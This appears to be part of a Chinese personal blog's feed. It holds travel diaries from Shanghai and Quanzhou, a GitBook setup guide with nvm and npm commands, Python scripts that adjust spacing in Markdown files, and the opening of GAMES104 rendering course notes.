    ​门票¥38。这个博物馆里除了我就是工作人员了……如果看过央美×中传游研社《电子游戏史》这个系列的视频的话,对这个博物馆里的绝大多数东西还是能够了解的。里面的东西挺精美,但是感觉馆里对早期的游戏发展介绍比较齐全,对于 21 世纪后的游戏几乎没有什么介绍,简单地一笔带过了。

    11:46 上海电影博物馆🤩

    上海电影集团

    ​想想到了徐汇了就再逛逛徐汇的地标。桂箐路钦江路-927 路-漕溪北路裕德路,¥2。

    当当当!

    ​来到了上海电影博物馆!门票居然要¥60……自己对电影了解的属实是不够多,看得不是很懂😬。

    12:49 徐家汇圣母院

    徐家汇圣母院

    ​1867 年,郎怀仁主教邀请拯亡会修女来上海协助传教。1868 年他在徐家汇耶稣会总院东侧建造新楼,于翌年竣工。1869 年,献堂会被批准正式成立并迁至新楼内,第一批拯望会修女也定居于此,承担培养贞女的任务。是年 9 月 8 日,初学院举行开幕礼并招收 32 位贞女。徐家汇圣母院由此最终形成。

    12:51 徐家汇站

    中国游戏看上海 上海游戏看徐汇

    ​教堂在马路另一边,附近没有路口可以过马路,只好从地铁站窜过去。

    12:56 徐家汇天主教堂🤩

    圣心大教堂 VS 徐家汇天主教堂

    ​这简直就是广州圣心大教堂的红色版!

    徐家汇天主教堂

    ​对游客来说,比圣心大教堂更好的是,这里似乎不怎么做礼拜,所以可以直接进去参观,没有什么限制!

    洋庙

    ​之后就该撤了!本来这里还有个徐家汇书院值得一逛,但我觉得进去一顿拍照打扰别人读书不太好,就直接回去了。徐家汇站-1 号线-人民广场,¥3。

    13:33 苔圣园酒家

    苔圣园酒家

    ​回去充个电躺一躺!据说酒店所处的黄河路是《繁花》的取景地,然而我并没有看过这个电视剧……

    14:38 四行仓库🤩

    吴淞江北

    ​来到了苏州河畔,这个仓库看上去还挺新的。

    西藏路桥

    ​又看到东方明珠了!

    The Joint Trust Warehouse

    ​没有想过这居然也是个人挤人的热门场馆……但是,我觉得里面基本没介绍什么淞沪会战的细节😵。

    枪林弹雨

    ​这个弹孔是现在复制而来的。据说特意把弹孔数量控制在了四百个(还是八佰?),对应着当时坚守四行仓库的战士们的数量。

    15:18 悠哈

    糖糖!

    15:24 棋牌文化博物馆🤩

    上海棋牌院

    ​里面有一个小小的棋牌博物馆。

    15:54 宝隆医院

    上海长征医院

    ​医院前身是 1900 年德国宝隆博士创办的“宝隆医院”,1930 年更名为“国立同济大学附属医院”,1948 年更名为“中美医院”;1955 年 10 月,由时任国防部长彭德怀元帅签署命令,成立了“上海急症外科医院”;1958 年 9 月,列编为“第二军医大学第二附属医院”;1966 年 9 月,经上海市批准对外称“上海长征医院”;1997 年江泽民同志为医院题写了院名。

    16:01 国际饭店

    又回来了!

    依旧排得像个贪吃蛇

    16:12 蟹黄汤包

    鱼丸汤 蟹黄汤包

    佳家汤包

    ​这一条路都是吃的,除了价格惊人以外都是优点。四粒鱼丸汤¥12,10 粒蟹黄汤包¥38。早早吃完洗澡睡觉了。


    ​之后就是本次行程最刺激的环节了😵。觉得下午逛的地方没达到预期,再加上又跑了一天属实有些劳累,就没跟家里人说,早早洗澡睡觉了。结果没回消息家里人觉得我出事了,直接让上海的亲戚过来打电话,后面还直接报警,不到 10 分钟警察直接找上门,搞得跟抓嫖娼一样,太可怕了😵。不会真觉得我会在中国第一城第一区里被抓去割腰子吧。

    这警察速度好快
    人都精神了
    不到 10 分钟,反应神速

    ​上海的亲戚还问我在上海玩了些啥,他们居然不知道四行仓库是什么🫢,也不知道天文馆在哪里,我计划去的地方都这么冷门的吗?然后说上海也就外滩和城隍庙比较有意思了。

    ​这么一折腾本来睡得香香的,最后又整到 11 点左右才接着睡了。

    ]]>
    @@ -305,7 +305,7 @@ /posts/Web-GitBook/ - 资源

    安装

    ​有两种方式可以配置 GitBook:

    ​本地版:

    ​网页版:

    规则

    开始

    本地版

    安装 nvm

    ​这个 GitBook 的本地版早已年久失修,用新的 Node.js 会出现兼容问题……得整一个 nvm 来切换 Node.js 版本。

    ​把原有的 Node.js 卸了,装 nvm。

    ​命令行查看 nvm 版本:

    nvm version
    1.1.12

    安装 npm

    找到 nvm 的安装路径,修改其中 settings.txt 的内容以配置镜像:

    root: C:\Users\XXX\AppData\Roaming\nvm
    path: C:\Program Files\nodejs
    node_mirror: https://npmmirror.com/mirrors/node/
    npm_mirror: https://npmmirror.com/mirrors/npm/

    ​这边还是下载失败,只好像安装 PyTorch 一样离线安装了……

    ​从 Node.js 中文网下载所需版本的预构建二进制文件,解压出来,并把解压出的目录改名成 nvm 能识别的 vX.Y.Z 形式。

    ​以此法装一个最新的 Node.js(v22.11.0) 和支持 GitBook 的 Node.js(v10.24.1)。命令行查看是否安装成功:

    nvm list
    22.11.0
    10.24.1

    ​激活!

    nvm use 10.24.1

    ​查看下载源:

    npm config get registry
    https://registry.npmjs.org/

    ​切换镜像:

    npm config set registry https://registry.npmmirror.com

    安装 GitBook

    ​安装 GitBook CLI:

    npm install -g gitbook-cli

    ​查看安装情况:

    gitbook -V
    CLI version: 2.3.2
    Installing GitBook 3.2.3
    gitbook@3.2.3 C:\Users\19048\AppData\Local\Temp\tmp-44796f14sHIZaeO0a\node_modules\gitbook
    ├── escape-html@1.0.3
    ...
    └── npm@3.9.2
    GitBook version: 3.2.3

    ​在项目文件夹下初始化 GitBook:

    gitbook init
    warn: no summary file in this book
    info: create README.md
    info: create SUMMARY.md
    info: initialization is finished
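
    ​SUMMARY.md 决定了书籍的目录结构,初始化后可以照着下面的样子补全。这是一个最小示例,其中 chapter1/README.md、chapter1/section1.md 等文件名只是演示用的假设:

    # Summary

    * [Introduction](README.md)
    * [Chapter 1](chapter1/README.md)
        * [Section 1.1](chapter1/section1.md)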

    ​查看帮助:

    gitbook help
    各命令的说明与选项/参数如下:

    • build [book] [output]:构建一本书
      --log:日志级别(默认是 info,可选:debug, info, warn, error, disabled)
      --format:构建格式(默认是 website,可选:website, json, ebook)
      --[no-]timing:打印调试信息(默认是 false)
    • serve [book] [output]:将书籍作为网站提供测试服务
      --port:服务器监听的端口(默认是 4000)
      --lrport:实时重载服务器的端口(默认是 35729)
      --[no-]watch:启用文件监视和实时重载(默认是 true)
      --[no-]live:启用实时重载(默认是 true)
      --[no-]open:启用在浏览器中打开书籍(默认是 false)
      --browser:指定用于打开书籍的浏览器(默认是空)
      --log、--format:同 build
    • install [book]:安装所有插件的依赖(--log 同上)
    • parse [book]:解析并打印书籍的调试信息(--log 同上)
    • init [book]:设置并创建章节文件(--log 同上)
    • pdf [book] [output]:将书籍构建成电子书文件(--log 同上)
    • epub [book] [output]:将书籍构建成电子书文件(--log 同上)
    • mobi [book] [output]:将书籍构建成电子书文件(--log 同上)
    ​编译:

    gitbook build

    ​得到网页文件:

    演示

    网页版

    ​按 GitBook 步骤走就行。得到一个域:Welcome | Zi-Zi’s Jounery

    ​使用 Edit in change request 编辑,使用 Merge 编译。

    说明(网页版)

    Welcome

    Welcome to the GitBook Starter Template! Here you’ll get an overview of all the amazing features GitBook offers to help you build beautiful, interactive documentation.

    ​欢迎使用 GitBook 入门模板!在这里,您将获得 GitBook 提供的所有惊人功能的概述,以帮助您构建美观、交互式的文档。

    You’ll see some of the best parts of GitBook in action — and find help on how you can turn this template into your own.

    ​您将看到 GitBook 的一些最佳部分正在发挥作用,并找到如何将此模板转化为自己的帮助。

    Getting Started

    Quickstart

    Beautiful documentation starts with the content you create — and GitBook makes it easy to get started with any pre-existing content.

    ​漂亮的文档从你创建的内容开始——GitBook 让你很容易开始使用任何预先存在的内容。

    Import

    GitBook supports importing content from many popular writing tools and formats. If your content already exists, you can upload a file or group of files to be imported.

    ​GitBook 支持从许多流行的写作工具和格式导入内容。如果您的内容已经存在,您可以上传一个或一组要导入的文件。


    Sync a repository

    GitBook also allows you to set up a bi-directional sync with an existing repository on GitHub or GitLab. Setting up Git Sync allows you and your team to write content in GitBook or in code, and never have to worry about your content becoming out of sync.

    ​GitBook 还允许您与 GitHub 或 GitLab 上的现有存储库设置双向同步。设置Git Sync 允许您和您的团队在 GitBook 或代码中编写内容,而无需担心您的内容会不同步。

    Publish your docs

    Once you’ve finished writing, editing, or importing your content, you can publish your work to the web as a docs site. Once published, your site will be accessible online only to your selected audience.

    ​一旦你完成了写作、编辑或导入内容,你就可以将你的作品作为文档网站发布到网上。一旦发布,您的网站将仅对选定的受众在线访问。

    You can publish your site and find related settings from your docs site’s homepage.

    ​您可以在文档网站的主页上发布您的网站并查找相关设置。


    Basics

    Editor

    GitBook has a powerful block-based editor that allows you to seamlessly create, update, and enhance your content.

    ​GitBook 有一个强大的基于块的编辑器,可以让你无缝地创建、更新和增强你的内容。


    Writing content

    GitBook offers a range of block types for you to add to your content inline — from simple text and tables, to code blocks and more. These elements will make your pages more useful to readers, and offer extra information and context.

    ​GitBook 提供了一系列块类型供您内联添加到内容中——从简单的文本和表格到代码块等等。这些元素将使您的页面对读者更有用,并提供额外的信息和背景。

    Either start typing below, or press / to see a list of the blocks you can insert into your page.

    ​请在下面开始键入,或按 / 查看可以插入页面的块列表。

    Markdown

    GitBook supports many different types of content, and is backed by Markdown — meaning you can copy and paste any existing Markdown files directly into the editor!

    ​GitBook 支持许多不同类型的内容,并由 Markdown 支持——这意味着您可以将任何现有的 Markdown 文件直接复制粘贴到编辑器中!


    Feel free to test it out and copy the Markdown below by hovering over the code block in the upper right, and pasting into a new line underneath.

    ​您可以随意测试它,并将鼠标悬停在右上角的代码块上,然后粘贴到下面的新行中,复制下面的 Markdown。

    # Heading

    This is some paragraph text, with a [link](https://docs.gitbook.com) to our docs.

    ## Heading 2
    - Point 1
    - Point 2
    - Point 3

    ​If you have multiple files, GitBook makes it easy to import full repositories too — allowing you to keep your GitBook content in sync.

    ​如果你有多个文件,GitBook 也可以轻松导入完整的存储库,让你的 GitBook 内容保持同步。

    Images & media

    GitBook allows you to add images and media easily to your docs. Simply drag a file into the editor, or use the file manager in the upper right corner to upload multiple images at once.

    ​GitBook 允许您轻松地将图像和媒体添加到文档中。只需将文件拖动到编辑器中,或使用右上角的文件管理器一次上传多张图像。


    You can also add images simply by copying and pasting them directly into the editor — and GitBook will automatically add it to your file manager.

    ​您还可以通过将图像直接复制并粘贴到编辑器中来添加图像,GitBook 会自动将其添加到您的文件管理器中。

    Interactive blocks

    In addition to the default Markdown you can write, GitBook has a number of out-of-the-box interactive blocks you can use. You can find interactive blocks by pressing / from within the editor.

    ​除了你可以编写的默认 Markdown 之外,GitBook 还有许多你可以使用的开箱即用的交互式块。您可以通过在编辑器中按 / 找到交互式块。


    Tabs

    Each tab is like a mini page — it can contain multiple other blocks, of any type. So you can add code blocks, images, integration blocks and more to individual tabs in the same tab block.

    ​每个选项卡都像一个迷你页面——它可以包含多个其他任何类型的块。因此,您可以将代码块、图像、集成块等添加到同一选项卡块中的各个选项卡中。

    Add images, embedded content, code blocks, and more.

    ​添加图像、嵌入式内容、代码块等。

    const handleFetchEvent = async (request, context) => {
        return new Response({message: "Hello World"});
    };

    Expandable sections

    Click me to expand

    Expandable blocks are helpful in condensing what could otherwise be a lengthy paragraph. They are also great in step-by-step guides and FAQs.

    ​可扩展块有助于压缩原本可能很长的段落。它们在分步指南和常见问题解答方面也很出色。

    Drawings
    Embedded content

    GitBook supports thousands of embedded websites out-of-the-box, simply by pasting their links. Feel free to check out which ones are supported natively.

    ​GitBook 支持成千上万的嵌入式网站,只需粘贴链接即可。请随时查看哪些是本机支持的。

    OpenAPI

    You can sync GitBook pages with an OpenAPI or Swagger file or a URL to include auto-generated API methods in your documentation.

    ​您可以将 GitBook 页面与 OpenAPI 或 Swagger 文件或 URL 同步,以便在文档中包含自动生成的 API 方法。

    OpenAPI block

    GitBook’s OpenAPI block is powered by Scalar, so you can test your APIs directly from your docs.

    ​GitBook 的 OpenAPI 块由 Scalar 提供支持,因此您可以直接从文档中测试您的API。

    Integrations

    GitBook integrations allow you to connect your GitBook spaces to some of your favorite platforms and services. You can install integrations into your GitBook page from the Integrations menu in the top left.

    ​GitBook 集成允许您将 GitBook 空间连接到您最喜欢的一些平台和服务。您可以从左上角的集成菜单将集成安装到 GitBook 页面中。


    ]]>
    @@ -330,7 +330,7 @@ /posts/Diary-%E5%95%8A%EF%BC%8110%20%E6%9C%88%EF%BC%81/ -
    ]]> +
    ]]>
    @@ -357,7 +357,7 @@ /posts/Web-%E4%B8%AD%E6%96%87%E6%96%87%E6%A1%88%E6%8E%92%E7%89%88%E6%8C%87%E5%8C%97%EF%BC%88%E7%AE%80%E4%BD%93%E4%B8%AD%E6%96%87%E7%89%88%EF%BC%89/ - 参考

    正文

    ​关于中英文之间的空格问题,已经争议良久,一部分人认为:中英文之间需要加空格,这是书面语的语法问题,就像是英文句子中,两个英文单词之间需要加空格一样。当然,也有人认为中文和英文之间不需要增加额外的空格,空格是为了增加区分度,而中文和英文本身就有自然的区分。中文和英文之间的间距,应该交给排版工具完成,作者不应该增加额外的干预。

    ​尽管我目前有在中英文之间加空格的习惯,但是总有疏忽的时候,对于从其他地方拷贝过来的文本还要手动修正格式真是太麻烦了!于是乎,我决定使用 Python 遍历我的 .md 文章,实现如下的排版规则:

    1. 中英文之间需要增加空格;
    2. 中文与数字之间需要增加空格;
    3. 数字与单位之间无需增加空格;
    4. 全角标点与其他字符之间不加空格。

    ​处理单个 .md 文件的脚本如下:

    import re

    def fix_spacing_rules(line):
        # 1. 中英文之间需要增加空格
        line = re.sub(r'([\u4e00-\u9fff])([a-zA-Z])', r'\1 \2', line)
        line = re.sub(r'([a-zA-Z])([\u4e00-\u9fff])', r'\1 \2', line)

        # 2. 中文与数字之间需要增加空格
        line = re.sub(r'([\u4e00-\u9fff])([0-9])', r'\1 \2', line)
        line = re.sub(r'([0-9])([\u4e00-\u9fff])', r'\1 \2', line)

        # 3. 数字与单位之间无需增加空格
        units = ['%', '°C', 'km', 'm', 'kg', 'g', 'cm', 'mm', 'L', 'ml', 'h', 'min', 's']
        for unit in units:
            line = re.sub(r'([0-9])\s+({})'.format(unit), r'\1\2', line)

        # 4. 全角标点与其他字符之间不加空格
        line = re.sub(r'([\u3000-\u303F\uFF00-\uFFEF])\s+', r'\1', line)
        line = re.sub(r'\s+([\u3000-\u303F\uFF00-\uFFEF])', r'\1', line)

        return line

    def process_md_file(file_path):
        # 读取单个 .md 文件
        with open(file_path, 'r', encoding='utf-8') as file:
            lines = file.readlines()

        updated_lines = []
        inside_yaml_header = False

        for line in lines:
            # 跳过 YAML 头文件部分(即以 "---" 包围的部分)
            if line.strip() == "---":
                inside_yaml_header = not inside_yaml_header
                updated_lines.append(line)
            elif inside_yaml_header:
                # 如果在 YAML 头文件部分,原样添加
                updated_lines.append(line)
            else:
                # 处理正文内容,保留行尾的换行符
                updated_lines.append(fix_spacing_rules(line.rstrip()) + line[len(line.rstrip()):])

        # 写回文件(如果内容有更新)
        if lines != updated_lines:
            with open(file_path, 'w', encoding='utf-8') as file:
                file.writelines(updated_lines)
            print(f"Processed: {file_path}")

    # 指定你要处理的 .md 文件路径
    file_path = "your_file_path_here.md"
    process_md_file(file_path)
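
    ​下面是一个最小的调用示例(字符串内容纯属演示),可以直观地看到这些规则的效果:

    print(fix_spacing_rules("今天用python处理了3个md文件"))
    # 输出:今天用 python 处理了 3 个 md 文件
    print(fix_spacing_rules("全程约 10 km,耗时 30 min。"))
    # 输出:全程约 10km,耗时 30min。

    ​如果要批量处理整个文件夹里的 .md 文章,可以改用下面的遍历版本:
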
    import os
    import re

    def fix_spacing_rules(line):
        # 1. 中英文之间需要增加空格
        line = re.sub(r'([\u4e00-\u9fff])([a-zA-Z])', r'\1 \2', line)
        line = re.sub(r'([a-zA-Z])([\u4e00-\u9fff])', r'\1 \2', line)

        # 2. 中文与数字之间需要增加空格
        line = re.sub(r'([\u4e00-\u9fff])([0-9])', r'\1 \2', line)
        line = re.sub(r'([0-9])([\u4e00-\u9fff])', r'\1 \2', line)

        # 3. 数字与单位之间无需增加空格
        units = ['%', '°C', 'km', 'm', 'kg', 'g', 'cm', 'mm', 'L', 'ml', 'h', 'min', 's']
        for unit in units:
            line = re.sub(r'([0-9])\s+({})'.format(unit), r'\1\2', line)

        # 4. 全角标点与其他字符之间不加空格
        line = re.sub(r'([\u3000-\u303F\uFF00-\uFFEF])\s+', r'\1', line)
        line = re.sub(r'\s+([\u3000-\u303F\uFF00-\uFFEF])', r'\1', line)

        return line

    def process_md_files(directory):
        # 遍历文件夹中的所有 .md 文件
        for filename in os.listdir(directory):
            if filename.endswith(".md"):
                file_path = os.path.join(directory, filename)
                with open(file_path, 'r', encoding='utf-8') as file:
                    lines = file.readlines()

                updated_lines = []
                inside_yaml_header = False

                for line in lines:
                    # 跳过 YAML 头文件部分(即以 "---" 包围的部分)
                    if line.strip() == "---":
                        inside_yaml_header = not inside_yaml_header
                        updated_lines.append(line)
                    elif inside_yaml_header:
                        # 如果在 YAML 头文件部分,原样添加
                        updated_lines.append(line)
                    else:
                        # 处理正文内容,保留行尾的换行符
                        updated_lines.append(fix_spacing_rules(line.rstrip()) + line[len(line.rstrip()):])

                # 如果内容有更新,则写回文件
                if lines != updated_lines:
                    with open(file_path, 'w', encoding='utf-8') as file:
                        file.writelines(updated_lines)
                    print(f"Processed: {filename}")

    # 指定你要遍历的文件夹路径
    directory_path = "your_directory_path_here"
    process_md_files(directory_path)
    ]]>
    @@ -382,7 +382,7 @@ /posts/Course-%E6%B8%B8%E6%88%8F%E5%BF%83%E7%90%86%E5%AD%A6-%E4%B8%AD%E5%9B%BD%E4%BC%A0%E5%AA%92%E5%A4%A7%E5%AD%A6/ - 资源

    正文

    其他

    ​从官网获取的 PDF 中,不同行之间的文字拷贝下来会留有空格,手动删起来真是太麻烦了!可用下面这段 Python 代码一次性移除:

    import os
    import re

    def remove_spaces_between_chinese(text):
        # 正则表达式匹配中文字符之间的空格
        # 其中 u4e00-u9fff 是常见的中文字符 Unicode 范围
        # 第二个汉字用 (?=...) 前瞻、不被消耗,这样连续的“字 字 字”也能一次清理干净
        pattern = re.compile(r'([\u4e00-\u9fff])\s+(?=[\u4e00-\u9fff])')
        # 删除匹配到的空格
        return pattern.sub(r'\1', text)

    def process_md_files(directory):
        # 遍历文件夹中的所有 .md 文件
        for filename in os.listdir(directory):
            if filename.endswith(".md"):
                file_path = os.path.join(directory, filename)
                with open(file_path, 'r', encoding='utf-8') as file:
                    content = file.read()

                # 删除中文字符之间的空格
                updated_content = remove_spaces_between_chinese(content)

                # 如果内容有更新,则写回文件
                if content != updated_content:
                    with open(file_path, 'w', encoding='utf-8') as file:
                        file.write(updated_content)
                    print(f"Processed: {filename}")

    # 指定你要遍历的文件夹路径
    directory_path = "your_directory_path_here"
    process_md_files(directory_path)
    ]]>
    @@ -584,7 +584,7 @@ /posts/Paper-An%20Improved%20Formula%20Extraction%20Method%20of%20Printed%20Chinese%20Layouts%20Based%20on%20Connected%20Component%20Run-Length%20Feature/ -
    ]]>
    @@ -663,7 +663,7 @@ /posts/Diary-%E5%95%8A%EF%BC%819%20%E6%9C%88%EF%BC%81/ -
    ]]>
    @@ -771,7 +771,7 @@ /posts/Diary-%E7%BE%8E%E4%B8%BD%E6%B3%89%E5%B7%9E/ - 前言

    该滚蛋了!

    ​暑假就要结束了!这回依旧打算从厦门飞。

    ​身为一个福建人从来没去过美丽泉州,我觉得不行!所以半道拐一下。

    正文

    7.28

    07:23 祥谦

    雾蒙蒙

    ​再见福州!要去河北了,居然还少见地刮起了雾霾,让我提前适应新生活,真是太感人了😭!

    07:45 福清

    大往服务区

    ​歇一歇。

    08:13 莆田

    双桥

    ​少见的斜拉桥和拱桥修得那么近。

    08:49 驿坂

    下高速了!

    ​进入泉州界!

    09:40 崇武

    崇武古城

    ​美丽泉州第一站——惠安崇武古城!

    ​在惠安一路上可以看到很多石雕,佛像啊石狮子之类的,体态庞大,看上去十分壮观,但是忘记拍照了😅。

    09:48 城外

    惠安女造型

    09:53 城内

    城内
    城内

    城内

    ​惠安崇武古城风景区,位于福建省泉州市惠安县崇武半岛东端,地处福建省东南沿海的突出部、泉州湾和湄州湾之间、惠安县境东南 24 千米的崇武半岛南端,濒临台湾海峡。崇武古城始建于明洪武二十年(1387 年)。

    ​虽是风景区,但好像并不完全是,大部分还是当地居民的居住之处。

    09:58 大海

    大海
    大海

    水天一色

    ​啊,大海,美丽的海,迷人的海~(这个排版样式看上去两张图融为一体了)

    10:03 大炮

    开炮!

    ​这个炮感觉就像个玩具……

    10:09 庙宇

    关帝庙
    关帝庙 关帝庙 关帝庙 关帝庙

    关帝庙

    ​注重传统礼仪的泉州人将庙宇修得金碧辉煌!

    ​后来才知道,寺庙内最好不要拍照,那还是不拍了。

    10:17 歌词

    爱拼才会赢!

    ​闽南网红金曲——《爱拼才会赢》!

            

    ​闽南人爱拼才会赢!闽东人赖了又吧唧😖。

    10:18 古厝

    古厝
    古厝

    石头房子

    ​一点点嵩口古镇的味道。

    10:28 城隍

    城隍庙 城隍庙 城隍庙 城隍庙

    城隍庙

    10:35 小街

    挂着灯笼

    ​一点点小时候的勺园里的味道。

    10:45 海潮

    海潮庵
    海潮庵 海潮庵 海潮庵 海潮庵

    海潮庵

    12:13 洛阳

    ​午饭就在崇武古城外面吃了碗贡丸汤,¥20。崇武特色小吃崇武鱼卷!我是不爱吃的。

    通向洛阳

    ​西晋末年中原战乱不止,大批汉人士族南渡入闽避乱,部分辗转来此,沿江尤选洛阳江万安渡口周围安居。唐初和唐末,中原地区两次大的战乱再次使中原士族大量南迁,洛阳镇成了中原汉人南迁避难的主要聚集地之一。中原士族南迁于此后,因思念家乡而以“洛阳”命名此地。

    ​啊!洛阳!代表了当时西晋末年胡搞瞎搞,可怜的老百姓们翻山越岭来到了泉州,为了思念故土,便取此地名为“洛阳”。

    12:19 晋江

    晋江大桥

    ​晋江市因西晋永嘉年间,中原百姓避战乱南迁,据江居住而得名。

    ​啊!晋江!代表了当时西晋末年胡搞瞎搞,可怜的老百姓们翻山越岭来到了泉州,为了思念故土,便取此地名为“晋江”。

    湖南简称湘,省会长沙有湘江;江西简称赣,省会南昌有赣江;福建简称闽,省会福州有闽江;山西简称晋,省会泉州有晋江。

    12:20 泰禾

    泉州之眼

    ​为什么摩天轮又叫 XX 之眼呢?

    16:10 民宿

    可爱的玩偶

    ​到民宿洗个澡,睡一觉,节奏慢一点,要走了好像也没啥心情特种兵了😭。

    ​民宿里这么大的玩具熊该如何清洗呢?

    16:13 窗外

    这就是东西塔!

    ​民宿的窗外可以直接看到烂怂塔耶!

    17:20 鲤城

    鲤城
    鲤城

    鲤城

    ​傍晚开车进鲤城,连个停车的地方都没有……

    17:47 西湖

    西湖公园
    西湖公园
    西湖公园

    西湖公园

    ​最后开到西湖公园才总算找到个地停车。

    18:03 小吃

    小吃店

    ​泉州人连店里都要摆一个灶台拜一拜耶。

    福州肉饼

    ​跟冀大里的闽南扒饭一样,属于是本地人听都没听说过的东西。

    闽南特色小吃

    ​点了一份烧肉粽和肉燕王。为什么要叫肉燕王呢?做法与肉燕不同,里面的肉馅是打成泥再充填地瓜粉的。好像没有普通肉燕好吃😇。

    闽南特色四果汤

    ​点了一份四果汤,感觉就像学校里的水果酸奶捞,酸奶换成了蜜水。

    18:53 夜晚

    晚上的鲤城 晚上的鲤城 晚上的鲤城 晚上的鲤城

    晚上的鲤城

​直接 citywalk 进鲤城走一走吧,人从众𠈌。

    19:16 西街

    西街
    西街

    西街

    ​接下来就该逛一逛人气最火爆的福州三坊七巷泉州西街了。

    19:32 双塔

    双塔
    双塔

    泉州开元寺塔

    ​晚上泉州开元寺就关门了。旅行者,前面的区域,明天再来探索吧!

    19:37 挂件

    钥匙挂件

    ​打卡一下伟哥的 QQ 头像。

    19:48 归程

    晚间西湖

    ​古城里面有个类似师大小白的东西,坐上去西湖公园下,一人¥2。然后今日行程就差不多了。

    7.29

    06:35 清晨

    可爱的玩偶

    ​第二天的行程开始咯!

    07:34 超雄

    牛逼的电瓶车

    ​前往古城中……

    ​美丽泉州哥的电瓶车真是太厉害了!直接插在机动车道上,还闯红灯😅。

    ​而福州的电瓶车经过多年来的严打,状况确实好了不少,有点能感受到当时福州政府的举措还是有些正确性的。

    ​也可能是泉州这个地方没有地铁,所以政府对电瓶车就睁一只眼闭一只眼了,主打一个权衡之术。

    08:03 早餐

    面线糊

    ​考研那段时间挺喜欢吃师大桃李园的一家面线糊 + 片皮鸭的,来泉州必须得尝尝。

    ​往面线糊里加了油条、醋肉、虾还有卤蛋。油条、醋肉和卤蛋跟面线糊相性挺好的,虾在里面都有点烂了😅。

    08:29 开元

    这就是开元寺!

    ​开冲!

    开元寺 开元寺 开元寺 开元寺 开元寺 开元寺

    莲花道场

    ​开元寺位于福建省泉州市鲤城区西街,是中国东南沿海重要的文物古迹,也是福建省内规模最大的佛教寺院。该寺始创于唐初垂拱二年(686 年),初名莲花道场,开元二十六年(738 年)更名开元寺,是宋元时期泉州规模最大、官方地位最突出的佛教寺院。现存主要庙宇系明、清两代修建,南北长 260 米,东西宽 300 米,占地面积 78000 平方米。

    ​里面有着许多虔诚的信徒。

    08:52 茶花

    出水茶花

    ​大早上暴雨初停。

    08:56 弘一

    弘一法师纪念馆

    ​李叔同(1880 年 10 月 23 日—1942 年 10 月 13 日),又名李息霜、李岸、李良,谱名文涛,幼名成蹊,学名广侯,字息霜,别号漱筒。
    ​李叔同是著名音乐家、美术教育家、书法家、戏剧活动家,是中国话剧的开拓者之一。他从日本留学归国后,担任过教师、编辑之职,后剃度为僧,法名演音,号弘一,晚号晚晴老人,后被人尊称为弘一法师。
    ​1913 年受聘为浙江两级师范学校(后改为浙江省立第一师范学校)音乐、图画教师。1915 年起兼任南京高等师范学校音乐、图画教师,并谱曲南京大学历史上第一首校歌。1942 年 10 月 13 日,弘一法师圆寂于泉州不二祠温陵养老院晚晴室。

    ​啊!长亭外,古道边。大名鼎鼎的弘一法师于泉州圆寂。

    09:08 猫咪

    橘猫

    ​猫咪猫咪!

    09:10 杂项

    石狮子
    石狮子
    开元寺塔
    开元寺塔
    石狮子
    石狮子

    开元寺核心!

    杂项 杂项 杂项 杂项 杂项

    杂项

    10:19 清源

    清源山登山处

    ​接下来就该去逛逛清源山了。

    10:28 老君

    直扑老君岩!

    ​清源山是一座大山。泉州这天气湿热湿热的,一直爬山属实是有点不舒服,于是决定就看个老君岩吧。¥70 就看了个石雕,真奢侈啊真奢侈。

    老君岩
    老君岩
    老君岩

    老子天下第一!

    16:09 出发

    ​之后回民宿附近的广场解决广场问题。泉州人这么爱吃辣吗为什么那么多湘菜川菜馆。

    ​广场里找了家粤菜馆解决了。我还是喜欢广州的粤菜😭。

    古厝

    ​洗洗睡,下午见个亲戚,曾被评为泉州年度十佳阳光老人🐮!

    ​民宿南门往下看,清一色的自建小别墅啊。

    16:29 田安

    田安大桥

    ​再次过晋江,这回要去丰泽区了,应该是泉州最繁华的地方。

    16:52 温陵

    就一小吃街

    ​蕃客西来尽有奇珍惊海北

    ​晋人南渡曾携乡味过江东

    ​本来想吃个饭再去见亲戚的,但是好像也不咋想吃东西,看着这里店面也不是很卫生,就算了。

    17:00 探亲

    7.30

    07:20 出发

    该滚蛋了,小骑士!

    ​吃个早饭去车站。

    07:24 车站

    泉州站

    ​来到了美丽泉州站。这么大的车站竟然不通高铁!

    07:33 候车

    D3333

    ​来早了,改签一个早一点的车次。D3333 福州南-深圳北。连号,看上去非常吉利啊!

    07:45 上车

    再见泉州!

    08:21 下车

    直取大巴! 直取大巴! 直取大巴!

    直取大巴!

    ​按小红书介绍,下车右转有厦门北到航站楼 T3 的免费大巴!冲!

    09:08 集美

    跨海
    跨海

    跨海

    ​在泉州还是雾蒙蒙的,到厦门就蓝天白云了。

    09:23 候机

    候机
    候机
    候机

    候机

    ​这个时间来比去年人少了很多。打印登机牌-托运-安检-候机,一气呵成。

    12:05 起飞

    再见南方!

    ​林北要走了😭!

    12:07 金门

    对岸

    ​遥远的金门列岛。据说马上就开放福建户口前往金门旅游了!

    13:48 济南

    奔流到海不复回

    ​一阵飞,我只认识这个浑浊的黄河和一个三角形的水库,这便是山东济南了。

    ​过了黄河就是河北了。

    14:15 河北

    农田中的村庄

    ​窗外的景色让我想起了初中地理课说的“大散居 小聚居 交错杂居”(虽然指的不是这个)。

    ​虽然都是一片大平原,但是看上去杂乱无章的,这么看自己在《城市天际线》里搭的城市还不错。

    14:24 降落

    ROCK HOME TOWN

    ​要降落了!这次一路平稳,连气流颠簸都没有。

    14:43 冀石

    冀冀冀冀冀

    ​坐了几次飞机也都习惯了。每次去拿行李再出来都是一个路线。

    14:47 摆渡

    机场摆渡车

    ​上次坐大巴的体验实在是太差了!我不能接受,我选择高铁。虽然这样算上等待时间耗时更长。

    15:16 开等

    G1516

    ​我下象棋,一阵乱赢!

    16:17 京畿

    这个时间,就会逆光

    ​最后坐公交车一哆嗦了!

    16:48 冀大

    不!岁月太漫长了!我不想来日方长!

    ]]>
    @@ -798,7 +798,7 @@ /posts/GAMES104-GPU-Driven%20Geometry%20Pipeline-Nanite/ - 资源

    课程

    “Long” Pipeline of Traditional Rendering

    传统渲染的“长”管道

    • Compute unit works with graphics processor and rasterizer

      计算单元与图形处理器和光栅化器配合使用

    • It’s a series of data processing units arranged in a chain like manner

      它是一系列以链式方式排列的数据处理单元

    • Difficult to fully fill the GPU

      很难完全填满 GPU

    webp

    Jungle of Direct Draw Graphics API

直接绘制(Direct Draw)图形 API 的丛林

    Explosion of DrawCalls:

    DrawCalls 激增:

    • Meshes x RenderStates x LoDs x Materials x Animations

      网格 x 渲染状态 x LoD x 材质 x 动画

    webp

    Problem 1: A traditional DrawIndexedInstanced command requires 5 arguments assigned on CPU

    问题 1:传统的 DrawIndexed Instanced 命令需要在 CPU 上分配 5 个参数

    webp

